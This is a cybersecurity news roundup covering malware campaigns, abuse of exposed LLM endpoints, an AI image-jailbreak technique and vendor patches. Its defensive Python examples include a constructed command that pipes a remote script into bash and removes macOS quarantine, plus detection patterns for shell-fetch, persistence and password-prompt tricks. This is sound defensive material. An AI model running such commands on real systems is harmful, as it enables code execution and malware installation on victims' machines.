
Daily Cybersecurity Roundup, January 30, 2026

In a digital bazaar where everything is for sale, threat actors are trading far more than goods. Operation Bizarre Bazaar, run by a threat actor using the alias Hecker, hijacked roughly 35,000 AI system sessions to siphon compute resources. In parallel, adversaries are abusing the Hugging Face platform to distribute thousands of polymorphic Android malware variants. Extending the abuse of trusted platforms, malicious Google search ads targeting “mac cleaner” queries are redirecting users to weaponized landing pages that deliver obfuscated shell commands. Keep reading further.


01

The Operation Bizarre Bazaar campaign, run by a threat actor using the alias Hecker, recorded roughly 35,000 AI system compromise sessions. The actor stole compute resources and resold access through silver.inc, getting in by abusing LLM endpoints that were exposed to the internet without any authentication.
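The entry point in this item is an LLM API that answers anyone who can reach it. The following Python check, an added example that is not code from the campaign reporting, probes two assumed self-hosted API shapes (Ollama's `/api/tags` and the OpenAI-compatible `/v1/models`) with an unauthenticated GET and classifies the answer. The hosts and responses in `FAKE_RESPONSES` are constructed so the check runs offline; `http_fetch` performs the live request. Run it only against endpoints you are authorised to test.

```python
"""Check whether self-hosted LLM API endpoints answer without credentials.

Added example; it is not code from the Operation Bizarre Bazaar reporting.
It assumes two common self-hosted API shapes (Ollama's /api/tags and the
OpenAI-compatible /v1/models). The hosts and responses in FAKE_RESPONSES
are constructed so the check runs offline; http_fetch does the real GET.
Only run it against endpoints you are authorised to test.
"""
import json
from typing import Callable, Dict, List, Tuple
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Paths that return a model inventory on the two assumed API shapes.
PROBE_PATHS = ("/api/tags", "/v1/models")

# A fetcher performs a GET with no Authorization header and returns (status, body).
Fetcher = Callable[[str], Tuple[int, str]]


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, str]:
    """Live fetcher: unauthenticated GET; status 0 means unreachable."""
    req = Request(url, headers={"User-Agent": "llm-exposure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""


def looks_like_model_list(body: str) -> bool:
    """True if the body is a JSON object whose 'models' or 'data' is a list."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict):
        return False
    return isinstance(doc.get("models", doc.get("data")), list)


def check_host(base_url: str, fetch: Fetcher = http_fetch) -> Dict[str, str]:
    """Map each probe path to a verdict.

    exposed        200 with a model list although no credentials were sent
    auth-required  401 or 403
    absent         404 or unreachable
    unknown        anything else (a proxy login page, a 5xx, ...)
    """
    verdicts: Dict[str, str] = {}
    for path in PROBE_PATHS:
        status, body = fetch(base_url.rstrip("/") + path)
        if status == 200 and looks_like_model_list(body):
            verdicts[path] = "exposed"
        elif status in (401, 403):
            verdicts[path] = "auth-required"
        elif status in (0, 404):
            verdicts[path] = "absent"
        else:
            verdicts[path] = "unknown"
    return verdicts


def exposed_hosts(hosts: List[str], fetch: Fetcher = http_fetch) -> List[str]:
    """Hosts where at least one probe path handed out a model list."""
    return [h for h in hosts if "exposed" in check_host(h, fetch).values()]


# Constructed responses for two imaginary hosts: one open, one gated.
FAKE_RESPONSES = {
    "http://10.0.0.5:11434/api/tags": (200, '{"models":[{"name":"llama3:8b"}]}'),
    "http://10.0.0.5:11434/v1/models": (200, '{"object":"list","data":[{"id":"llama3:8b"}]}'),
    "http://10.0.0.6:8000/api/tags": (404, ""),
    "http://10.0.0.6:8000/v1/models": (401, '{"error":"missing api key"}'),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for http_fetch backed by FAKE_RESPONSES."""
    return FAKE_RESPONSES.get(url, (0, ""))


if __name__ == "__main__":
    hosts = ["http://10.0.0.5:11434", "http://10.0.0.6:8000"]
    for host in hosts:
        print(host, check_host(host, fake_fetch))
    print("exposed:", exposed_hosts(hosts, fake_fetch))
```

An "exposed" verdict means the server handed out its model inventory to an anonymous client, which is exactly the condition this campaign relied on; the fix is a reverse proxy or API gateway that requires a token, or binding the service to localhost.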

02

Threat actors are abusing the Hugging Face platform to host and distribute thousands of polymorphic Android malware variants through a dropper app called TrustBastion, which abuses Android Accessibility Services to read screen content, steal credentials, and exfiltrate data.
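The tell-tale combination in a dropper like this is an accessibility service plus permissions an assistive app has no reason to hold. The Python triage below is an added example, not code from the TrustBastion analysis. It takes a decoded, text-form AndroidManifest.xml (binary AXML pulled from an APK must be decoded first, for example with apktool) and flags accessibility services that sit next to install, overlay, or SMS permissions. Both sample manifests are constructed.

```python
"""Static triage of a decoded AndroidManifest.xml for dropper-style abuse.

Added example, not code from the TrustBastion analysis. It expects the
text form of the manifest (apktool output), not binary AXML. The two
sample manifests at the bottom are constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"            # android:name as ElementTree sees it
A_PERMISSION = f"{{{ANDROID_NS}}}permission"  # android:permission

ACCESSIBILITY_ACTION = "android.accessibilityservice.AccessibilityService"
BIND_ACCESSIBILITY = "android.permission.BIND_ACCESSIBILITY_SERVICE"

# Permissions that, combined with an accessibility service, fit a
# credential-stealing dropper far better than an assistive app.
RISKY_PERMISSIONS = {
    "android.permission.REQUEST_INSTALL_PACKAGES",  # sideload a second stage
    "android.permission.SYSTEM_ALERT_WINDOW",       # overlay fake login screens
    "android.permission.READ_SMS",                  # read one-time codes
    "android.permission.RECEIVE_SMS",               # intercept one-time codes
}


def triage_manifest(xml_text: str) -> Dict[str, object]:
    """Return package name, accessibility services, risky permissions, verdict.

    verdict: 'suspicious' when an accessibility service and at least one
    risky permission coexist; 'accessibility-only' when only the service is
    present (legitimate for assistive apps); 'clean' otherwise.
    """
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    perms = {p.get(A_NAME, "") for p in root.iter("uses-permission")}

    a11y_services: List[str] = []
    for svc in root.iter("service"):
        # Either marker identifies an accessibility service: the bind
        # permission on the <service>, or the intent-filter action.
        binds = svc.get(A_PERMISSION) == BIND_ACCESSIBILITY
        actions = {a.get(A_NAME) for a in svc.iter("action")}
        if binds or ACCESSIBILITY_ACTION in actions:
            a11y_services.append(svc.get(A_NAME, "?"))

    risky = sorted(perms & RISKY_PERMISSIONS)
    if a11y_services and risky:
        verdict = "suspicious"
    elif a11y_services:
        verdict = "accessibility-only"
    else:
        verdict = "clean"
    return {
        "package": package,
        "accessibility_services": a11y_services,
        "risky_permissions": risky,
        "verdict": verdict,
    }


# Constructed manifest mimicking a dropper: accessibility + install + overlay.
SAMPLE_DROPPER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cleaner">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Cleaner">
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed manifest for an ordinary network-only app.
SAMPLE_BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>"""


if __name__ == "__main__":
    for text in (SAMPLE_DROPPER_MANIFEST, SAMPLE_BENIGN_MANIFEST):
        print(triage_manifest(text))
```

The check is deliberately conservative: an accessibility service on its own is not evidence of malice, so it reports "accessibility-only" and leaves the judgement to the analyst; only the pairing with install, overlay or SMS permissions escalates to "suspicious".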

03

A fraudulent ClawdBot Agent VS Code extension impersonated a legitimate AI assistant while silently installing a weaponized ScreenConnect remote access tool that phones home to attacker infrastructure, with multiple fallback loaders to keep the implant in place if one path fails.

04

Offensive researchers released Swarmer, a tool that abuses the little-used Windows Offline Registry API together with mandatory user profiles to achieve stealthy persistence; because the hives are written offline rather than through the live registry API, the technique sidesteps the user-mode hooks most EDR products rely on.

05

A new “semantic chaining” attack technique was described that leverages generative AI model behavior to produce image jailbreaks, another example of the AI-centric exploitation vectors now emerging.

06

Suspicious Google search ads for “mac cleaner” and similar queries redirected to harmful landing pages that deliver obfuscated shell commands; once executed, the commands give the attacker code execution on the macOS device and a path to install further malware.
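Landing pages of this kind usually wrap the real command in one or more base64 layers so that what the user sees reveals nothing. The Python helper below is an added example for triaging such a one-liner; it is not code from the campaign or from any vendor report. It peels base64 layers until the plaintext command appears and then flags macOS-specific behaviours worth a second look. The sample command is constructed (example.com is a reserved domain) and is encoded in the module itself so the decoding path is exercised end to end.

```python
"""Peel base64 layers off an obfuscated shell one-liner and flag risky verbs.

Added example for triaging the kind of command these landing pages deliver;
it is not code from the campaign or from any vendor report. The sample
command at the bottom is constructed (example.com is a reserved domain).
"""
import base64
import binascii
import re
from typing import List, Optional

# A run of base64 alphabet characters long enough to be a payload, not a word.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Behaviours worth a second look in anything a web page asks a user to run.
INDICATORS = {
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "quarantine-bypass":     re.compile(r"xattr\s+-(d\s+com\.apple\.quarantine|c\b)"),
    "persistence":           re.compile(r"launchctl\s+(load|bootstrap)|LaunchAgents|LaunchDaemons"),
    "credential-prompt":     re.compile(r"osascript.*(password|administrator privileges)", re.I),
    "hidden-background":     re.compile(r"\bnohup\b|&\s*$|>\s*/dev/null"),
}


def _decode_b64(blob: str) -> Optional[str]:
    """Decode one blob; None if it is not base64 or does not decode to text."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", "replace")
    # Random byte soup that happens to be valid base64 decodes to control
    # characters; real shell commands do not.
    if any(ord(c) < 32 and c not in "\n\t\r" for c in text):
        return None
    return text


def peel_layers(cmd: str, max_depth: int = 5) -> List[str]:
    """Return [original, decoded layer 1, decoded layer 2, ...].

    Each layer is the previous one with every decodable base64 blob replaced
    by its plaintext, so 'echo <b64> | base64 -D | sh' turns into the command
    the victim's shell would actually run. Stops when nothing decodes.
    """
    layers = [cmd]
    for _ in range(max_depth):
        changed = False

        def substitute(match: "re.Match[str]") -> str:
            nonlocal changed
            decoded = _decode_b64(match.group(0))
            if decoded is None:
                return match.group(0)
            changed = True
            return decoded

        nxt = B64_RE.sub(substitute, layers[-1])
        if not changed:
            break
        layers.append(nxt)
    return layers


def indicators(cmd: str) -> List[str]:
    """Sorted names of INDICATORS that match in any decoded layer."""
    hits = set()
    for layer in peel_layers(cmd):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return sorted(hits)


# Constructed sample: the inner command fetches a script into bash and strips
# the quarantine attribute; the outer wrapper is what the page would show.
SAMPLE_INNER = ("curl -fsSL http://example.com/update.sh | bash; "
                "xattr -d com.apple.quarantine /Applications/Cleaner.app")
SAMPLE_CMD = "echo " + base64.b64encode(SAMPLE_INNER.encode()).decode() + " | base64 -D | sh"


if __name__ == "__main__":
    for depth, layer in enumerate(peel_layers(SAMPLE_CMD)):
        print(f"layer {depth}: {layer}")
    print("indicators:", indicators(SAMPLE_CMD))
```

Matching runs over every layer, not just the last, because some wrappers keep part of the logic (a `nohup` or a redirect to `/dev/null`) outside the encoded blob. The 24-character threshold keeps ordinary words and short paths from being mistaken for payloads; lower it if a sample uses many small chunks joined at runtime.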

07

Google disrupted the infrastructure of the IPIDEA residential proxy network, whose trojanized Android apps and Windows binaries (linked to the BadBox 2.0 malware) routed and masked malicious traffic used for credential theft, botnet command and control, and other abuse.

08

A malicious update was distributed through MicroWorld’s eScan antivirus update infrastructure, deploying a multi-stage downloader that modifies registry keys and the product’s update configuration; remediation is manual, requiring the eScan update settings to be restored and the C2 domains to be blocked.

09

SolarWinds released patches for critical vulnerabilities in its Web Help Desk service desk product that could be exploited for remote code execution or privilege escalation, and urged customers to update immediately.

10

NVIDIA patched four high-severity vulnerabilities (CVE-2025-33217, CVE-2025-33218, CVE-2025-33219, CVE-2025-33220) in its GPU Display Driver and vGPU software that could enable code execution, privilege escalation, DoS, and information disclosure on Windows and Linux systems.
